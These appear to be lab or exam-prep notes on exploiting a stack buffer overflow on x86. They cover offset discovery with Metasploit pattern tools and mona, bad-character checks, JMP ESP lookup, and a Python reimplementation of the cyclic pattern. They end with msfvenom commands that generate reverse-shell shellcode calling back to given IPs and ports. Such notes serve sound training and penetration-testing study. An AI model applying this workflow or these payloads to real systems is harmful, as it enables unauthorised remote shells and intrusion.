Procedure

Finding the offset

msf-pattern_create -l 2500

Finding the exact value of the offset.

-q: corresponds to the value of EIP when the application crashed (as shown in the debugger).

-l: corresponds to the length passed to msf-pattern_create (-l), so that the same pattern is regenerated.

Both methods are valid to find the offset

msf-pattern_offset -l 2500 -q 35724134

OR

-distance: corresponds to the distance over which mona searches for the msf-pattern_create pattern.

!mona findmsp -distance 2400
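As an added example, not part of the original notes, the following Python reimplements the cyclic-pattern logic behind msf-pattern_create and msf-pattern_offset. It shows why the crash value 35724134 above resolves to an offset: the EIP value is converted back to the little-endian byte order it had in memory ("4Ar5") and that 4-byte window is located in the pattern.

```python
import string
from typing import Optional

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits


def pattern_create(length: int) -> bytes:
    """Return the first `length` bytes of the cyclic pattern Aa0Aa1...Aa9Ab0...

    The digit cycles fastest, then the lower-case letter, then the upper-case
    letter, so the sequence only repeats after 26 * 26 * 10 * 3 = 20280 bytes.
    """
    out = bytearray()
    for upper in UPPER:
        for lower in LOWER:
            for digit in DIGITS:
                out += f"{upper}{lower}{digit}".encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(eip_hex: str, length: int = 2500) -> Optional[int]:
    """Locate the crash EIP in a pattern of `length` bytes.

    `eip_hex` is the value as printed by the debugger (e.g. "35724134").
    x86 is little-endian, so the four bytes were stored on the stack in
    reverse order: 0x35724134 -> b"4Ar5". Returns the offset or None.
    """
    needle = int(eip_hex, 16).to_bytes(4, "little")
    idx = pattern_create(length).find(needle)
    return idx if idx != -1 else None


if __name__ == "__main__":
    # Same query as the msf-pattern_offset command in these notes.
    print(pattern_offset("35724134", 2500))  # → 524
```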

Finding the badchars

Create a mona working directory

!mona config -set workingfolder c:\mona

Create a mona bytearray excluding \x00, which is treated as a bad character by default (it terminates C strings).

!mona bytearray -cpb "\x00"

Compare with mona

-a: corresponds to the ESP value when the application crashed (the address where the bytearray landed in memory).

!mona compare -f c:\mona\bytearray.bin -a 005FFCB0

Manual method

We expect to see all characters from \x01 to \xff in sequential order.

Remove the character that breaks the sequence (\x51 in this example) from the bad character string in the exploit.py script. Resend the bad character string to the application and repeat the process until you no longer encounter any anomaly in the sequence.

Finding the right module

This command lists all JMP ESP addresses whose bytes do not contain any of the bad characters identified earlier.

!mona jmp -r esp -cpb "\x00"

Generating the payload

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.177.130 LPORT=9999 EXITFUNC=thread -b "\x00" -f c
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.49.230 LPORT=7138 -f c -b "\x00" EXITFUNC=thread
